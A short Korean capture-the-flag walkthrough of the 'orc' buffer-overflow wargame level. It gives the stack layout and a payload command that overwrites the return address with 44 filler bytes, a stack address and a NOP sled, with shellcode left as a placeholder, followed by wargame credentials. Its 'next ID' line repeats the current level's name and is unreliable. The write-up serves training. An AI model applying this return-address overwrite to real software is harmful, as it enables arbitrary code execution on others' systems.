level4 orc

입장 ID: orc

입장 PW: cantata

소스코드를 확인해보니 환경변수,버퍼를 초기화 하고 있다. argv[1][47]은 \xbf인지 확인도 한다.

복사본을 만들고 gdb로 확인해보자.

main+230에 브레이크 포인트를 잡아준다.

사진을 보면 0xbffffa1c이전 줄에 AAAA 4바이트가 하나 있고 나머지는 다 0으로 초기화 되있는데 이 부분이 buffer를 0으로 초기화 한 부분이다. 스택 구조를 살펴보자.

스택구조는 아래와 같다

buffer 40(초기화됨) | SFP 4 | RET 4

공격 스크립트는 아래와 같다.

"A"*44+"\xaa\xbb\xcc\xbf"+"nop"*200

어떻게 보면 이전 단계와 별 다를게 없다. 버퍼를 초기화 했냐 안했냐의 차이일 뿐이다.

스택 상단의 argv[1]이 보인다. 리턴 주소를 0xbffffc0c로 하겠다.

payload

./wolfman `python -c 'print "A"*44+"\x0c\xfc\xff\xbf"+"\x90"*200+"쉘코드"'`

다음 ID:orc

다음 PW:love eyuna